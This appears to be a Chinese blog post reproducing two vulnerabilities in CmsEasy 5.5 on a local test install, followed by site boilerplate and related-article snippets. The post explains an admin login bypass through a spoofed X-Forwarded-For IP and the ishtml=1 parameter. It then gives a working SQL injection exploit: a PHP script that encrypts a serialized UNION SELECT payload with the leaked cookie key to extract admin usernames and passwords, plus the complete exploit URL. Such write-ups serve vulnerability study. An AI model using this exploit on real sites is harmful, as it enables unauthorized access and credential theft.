cmseasy-sql注入

最新推荐文章于 2024-08-14 11:48:13 发布
最新推荐文章于 2024-08-14 11:48:13 发布
阅读量401 收藏 5
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65350813/article/details/141102233
版权

1.环境配置

网站:

数据库:

2.绕过密码直接登录

对原代码审计,在admin.php可以注意的点是

只要符合这个点,就不会去验证是不是管理员

所以

我将浏览器的网站路径复杂到Firefox界面如下,并根据代码加上&ishtml=1,看能不能直接不输入密码直接登录

回车就直接进入了网站里面了,绕过了登录界面

不过在之前需要在火狐下载一个插件

这个插件是可以修改你服务端的IP

这是第一个漏洞,未授权账号密码,因为代码写的有问题,导致我可以通过代码审计获取到非法进入后台的方式

3.sql注入

进入后台后,我拿到了Cookie安全码:5782c2394927208d8d536b9ed05b1a51

继续代码审计

在远程登录代码里

这段代码意思:拿到cookie码,将获得的grgs通过base64解码,xxtea_decrypt函数来解密,全部解密后,将参数进行反序列化(unserialize是反序列化函数),反序列化完后,放在getrow,这里getrow函数表示获取数据库一行

根据这个代码,我们考虑注入的一个条件,先是要拿到cookie,找到加密函数xxtea_encrypt

<?php

function xxtea_encrypt($str, $key) {
    if ($str == "") {
        return "";
    }
    $v = str2long($str, true);
    $k = str2long($key, false);
    if (count($k) < 4) {
        for ($i = count($k); $i < 4; $i++) {
            $k[$i] = 0;
        }
    }
    $n = count($v) - 1;

    $z = $v[$n];
    $y = $v[0];
    $delta = 0x9E3779B9;
    $q = floor(6 + 52 / ($n + 1));
    $sum = 0;
    while (0 < $q--) {
        $sum = int32($sum + $delta);
        $e = $sum >> 2 & 3;
        for ($p = 0; $p < $n; $p++) {
            $y = $v[$p + 1];
            $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
            $z = $v[$p] = int32($v[$p] + $mx);
        }
        $y = $v[0];
        $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
        $z = $v[$n] = int32($v[$n] + $mx);
    }
    return long2str($v, false);
}
function str2long($s, $w) {
    $v = unpack("V*", $s. str_repeat("\0", (4 - strlen($s) % 4) & 3));
    $v = array_values($v);
    if ($w) {
        $v[count($v)] = strlen($s);
    }
    return $v;
}
function long2str($v, $w) {
    $len = count($v);
    $n = ($len - 1) << 2;
    if ($w) {
        $m = $v[$len - 1];
        if (($m < $n - 3) || ($m > $n)) return false;
        $n = $m;
    }
    $s = array();
    for ($i = 0; $i < $len; $i++) {
        $s[$i] = pack("V", $v[$i]);
    }
    if ($w) {
        return substr(join('', $s), 0, $n);
    }
    else {
        return join('', $s);
    }
}
function int32($n) {
    while ($n >= 2147483648) $n -= 4294967296;
    while ($n <= -2147483649) $n += 4294967296;
    return (int)$n;
}

将加密函数和相关函数复制到php文件里

 cmseasy_user表里有20个字段

sql注入代码

<?php  
  
$key = '5782c2394927208d8d536b9ed05b1a51'; // 获得的cookie密钥  
  
// 注入语句作为数组的一个元素  
$table = array(  
    'sql' => 'userid`=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 FROM cmseasy_user LIMIT 0,1#' //由于是开源代码,可以知道数据库的源码和架构 
);  
  
// 序列化数组,然后加密,其实就是跟源码执行方式相反  
$encrypted = base64_encode(xxtea_encrypt(serialize($table), $key));  
echo $encrypted;  
function long2str($v, $w) {
    $len = count($v);
    $n = ($len - 1) << 2;
    if ($w) {
        $m = $v[$len - 1];
        if (($m < $n - 3) || ($m > $n)) return false;
        $n = $m;
    }
    $s = array();
    for ($i = 0; $i < $len; $i++) {
        $s[$i] = pack("V", $v[$i]);
    }
    if ($w) {
        return substr(join('', $s), 0, $n);
    }
    else {
        return join('', $s);
    }
}

function str2long($s, $w) {
    $v = unpack("V*", $s. str_repeat("\0", (4 - strlen($s) % 4) & 3));
    $v = array_values($v);
    if ($w) {
        $v[count($v)] = strlen($s);
    }
    return $v;
}

function int32($n) {
    while ($n >= 2147483648) $n -= 4294967296;
    while ($n <= -2147483649) $n += 4294967296;
    return (int)$n;
}

function xxtea_encrypt($str, $key) {
    if ($str == "") {
        return "";
    }
    $v = str2long($str, true);
    $k = str2long($key, false);
    if (count($k) < 4) {
        for ($i = count($k); $i < 4; $i++) {
            $k[$i] = 0;
        }
    }
    $n = count($v) - 1;

    $z = $v[$n];
    $y = $v[0];
    $delta = 0x9E3779B9;
    $q = floor(6 + 52 / ($n + 1));
    $sum = 0;
    while (0 < $q--) {
        $sum = int32($sum + $delta);
        $e = $sum >> 2 & 3;
        for ($p = 0; $p < $n; $p++) {
            $y = $v[$p + 1];
            $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
            $z = $v[$p] = int32($v[$p] + $mx);
        }
        $y = $v[0];
        $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
        $z = $v[$n] = int32($v[$n] + $mx);
    }
    return long2str($v, false);
}

执行:

注意:在里面”/",“+必须要urlcode编码,不编码就会对应地方截断

改:/>-----%2f   +---->%2b

任何访问后端?

访问方式:http://127.0.0.1/CmsEasy_5.5_UTF-8_20140605/uploads/index.php?case=admin&act=remotelogin&admin_dir=admin&site=default&args=xUKKUusexld8%2fO2638yd42xG%2b5Vx2Eumj9azpzanmLlGno4T4yiJvEmMB6aYW0FNRw4ZB8mFNr26fWwovnLsEzR9SsIP2MI4hGus8WrJE4hkSPs42xHYej%2bstJH0soK%2f59iAyNud6IarQbGxnJBNa6oiHPKC8p0kzfU8b1s6bPUa1kX2vOeZRtqyrqTaban%2fwHE1ZLhYLzCsSvcHlNgCCnJBIL0=

这个要根据自己的地址写

这里已经可以拿到网站的密码和账号了

日记更新中
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入pythonpoc_基于python编写PoC
weixin_39746241的博客
12-17 364
0x02 SQL Injection poc编写已知CmsEasy 5.5 UTF-8程序存在SQL注入,乌云漏洞中的漏洞细节比较详细(由于wooyun已经暂停访问,故不上链接了)。·首先,我们需要下载其相关源码,进行本地搭建。·阅读漏洞细节,我们得知其url与payload如下:URL:http://xxx.xxx/celive/live/header.phpPayload:xajax=Live...
CmsEasy crossall_act.php SQL注入漏洞.md
04-08
CmsEasy crossall_act.php SQL注入漏洞.md
CMSeasy-SQL注入
wh15320219935的博客
08-07 304
也就是说,我有了密钥,就能构造一个注入语句进行注入,而且因为最后的数据是base64编码过的,所以根本不怕任何waf,比如360webscan。在admin.php文件中我们可以发现如果用户ip等于服务器ip的话且有ishtml=1我们可以直接进行返回并且不会执行check_admin。,并base64解码,解码以后再xxtea解密(密钥就是刚才得到的字符串),解密以后再反序列化得到一个对象,直接放进数据库中查询。在lib\admin\admin_act.php下,我们可以发现远程登录的函数,先获得。
ThinkPHP5.1.C+CmsEasy-SQL注入
m0_67441173的博客
08-11 990
用户可控数据未经过滤,传入 Query 类的 max 方法进行聚合查询语句构造,接着调用本类的 aggregate 方法,本次漏洞问题正是发生在该函数底层代码中,所以所有调用该方法的聚合方法均存在 SQL 注入问题,我们看到 aggregate 方法又调用了 Mysql 类的 aggregate 方法,在该方法中,我们可以明显看到程序将用户可控变量 $field 经过 parseKey 方法处理后,与 SQL 语句进行了拼接。Builder类下的select方法:重点看对字段的处理,也就是重点看。
sql注入实战-cmseasy注入
2301_79915754的博客
08-13 239
分析:拿到安全码,被base64_decode解码,然后被xxtea_decrypt函数解密,全部解密完之后进行反序列化;未授权登陆:实现__construct函数里面的当两个条件,就不会验证check_admin;这里看一下getrow函数是干嘛的:发现'1 desc' 是在对数据库进行操作;然后user似乎跟数据库有关,这里看一下:table这里发现确实跟数据库有关;因为IP是HTTP_X_FORWARDED_FOR来获取的,可以伪造;现在登陆后台查看cookie安全码位置,复制网址并退出登陆;
cmseasy_5.5-SQL注入漏洞复现
m0_68533808的博客
08-12 642
由下面三幅图可知,Cookie安全码编码,加密,反序列化后就可以用getrow函数去使用数据库了。以未授权方式拿到Cookie安全码,并通过Cookie安全码拿到数据库中的账号和密码。注:这里的+和/都需要再次编码,不然会被url识别为空格进行截断,无法正常运行。在火狐上下载X-Forwarded-For Header插件。运行后得到先序列号,然后再加密后然后再编码后的一个值。注:此网站模板是开源的所以可以看到一些后台代码。进入后拿去 Cookie安全码。+变为%2b,/变为%2f。如下图所示,获取成功。
web安全-sql注入
先剃度再出家
01-28 2921
sql注入1、联合查询一、报错查询1、extractvalue(1,1)2、updatexml(1,1,1)3、floor() 1、联合查询 一、报错查询 1、extractvalue(1,1) 2、updatexml(1,1,1) 3、floor()
Ajax post sql注入,cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
weixin_39778582的博客
08-05 411
摘要cmseasy前台无需登录直接获取敏感数据的SQL注入cmseasy 前台无�cmseasy前台无需登录直接获取敏感数据的SQL注入cmseasy 前台无视gpc的sql注入我下载的是最新版本的cmseasy,之前有人提过这里的漏洞,官方进行了修补,但是越修补,越捉急,直接看代码:这里是注册函数的地方celive.class.php(480-497):function xajax_live()...
360 php SQL注入,CMSeasy SQL注入漏洞一发(bypass自身与360waf)
weixin_33800074的博客
04-11 432
### 简要描述:也不知道重复没有- -!### 详细说明:/lib/default/archive_act.php:```function respond_action() {include_once ROOT . '/lib/plugins/pay/' . front::$get['code'] . '.php';$payclassname = front::$get['code'];$pay...
easycms php7.1,cmseasy sql注入漏洞(无视防御)
weixin_35029527的博客
03-29 1028
cmseasy某处sql注入,无视防御从/celive/live/index.php开始:include('../include/config.inc.php');include_once(CE_ROOT . '/include/celive.class.php');$ac = addslashes($_GET['action']);if ($ac == '1') {$live = new cel...
CmsEasy可视化编辑企业网站商城系统
08-17
7. **安全性**:虽然未详细列出安全相关的文件,但一个成熟的企业商城系统通常会包含安全防护措施,例如防止SQL注入、XSS攻击的过滤机制,以及定期的安全扫描和更新来抵御新出现的威胁。 8. **多语言支持**:从...
CmsEasy_UTF-8_en
11-13
- **安全防护**:作为一个成熟的CMSCmsEasy可能会提供一定的安全措施,如防止SQL注入、XSS攻击等,保护用户网站免受恶意攻击。 - **扩展性强**:通过插件和模块,CmsEasy可以扩展其功能,满足用户的个性化需求。 ...
Awesome-POC-master.zip
05-18
CHECKLIST Nacos 漏洞 Checklist SmartBi 漏洞 Checklist ...CmsEasy crossall_act.php SQL注入漏洞 CmsEasy language_admin.php 后台命令执行漏洞 CmsEasy update_admin.php 后台任意文件上传漏洞 ...
CmsEasy代码审计1
08-03
在进行Web应用程序的安全审计时,发现CmsEasy存在一个严重的SQL注入漏洞,这个问题主要源于对用户输入的不安全处理。本文将深入解析这个问题,并提供相关的背景、触发条件以及缓解措施。 CmsEasy是一款基于MVC架构...
安全:企业上云后不可忽视的安全挑战与解决方案
A526847的博客
08-14 303
企业上云是数字化转型的必然趋势,但云安全风险也如影随形。企业必须正视云安全挑战,采取切实有效的措施来保障云安全。通过数据加密、访问控制、安全审计、备份与恢复、灾备管理、选择可信的云服务供应商和加强内部安全管理等手段,企业可以构建完善的云安全体系,确保云服务的可靠性和安全性。在未来的数字化转型中,云安全将成为企业不可或缺的重要保障。
Java后端处理前端字符串与 JSON 数据:安全拼接与转义技巧
服务员的博客
08-09 427
在 Spring Boot 中处理前端传递的字符串和 JSON 数据时,需要注意潜在的 JSON 特殊字符问题。我们可以通过手动转义或借助 Jackson 库来安全地拼接字符串和 JSON 数据,确保数据完整性和程序稳定性。希望本文能够帮助您更好地理解 Spring Boot 中字符串与 JSON 数据处理的相关技巧,并在实际项目中得心应手。
等保2.0时代,企业如何平衡安全与发展
最新发布
waitaikong_的博客
08-14 192
此外,等保2.0还强化了安全管理的要求,企业需要建立完善的安全管理体系,包括安全策略、管理制度、人员培训、应急预案等,以确保安全保护措施的有效实施。等保2.0(网络安全等级保护2.0)是中国网络安全领域的重要标准,它在原有等保1.0的基础上进行了全面升级,以适应云计算、大数据、物联网、移动互联网等新兴技术的安全保护需求。等保2.0的实施促使企业加强网络安全管理和技术防范措施,这不仅有助于提升企业的网络安全防护水平,降低安全风险,还能提高企业的竞争力和信誉度。
安全无忧!Windows7全补丁旗舰版:集成所有补丁!
lihuiyun184291的博客
08-13 366
今日,系统之家小编给大家分享集成所有补丁的Windows7旗舰版系统,集成至2023.12所有官方补丁,修复了系统高危漏洞,让大家时刻都能舒心地展开操作。系统基于微软 Windows 7 2009 SP1 旗舰版进行离线制作,全新升级的优化方案,系统性能更好,运作更加流畅,且系统安装步骤简单易懂,支持硬盘安装。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值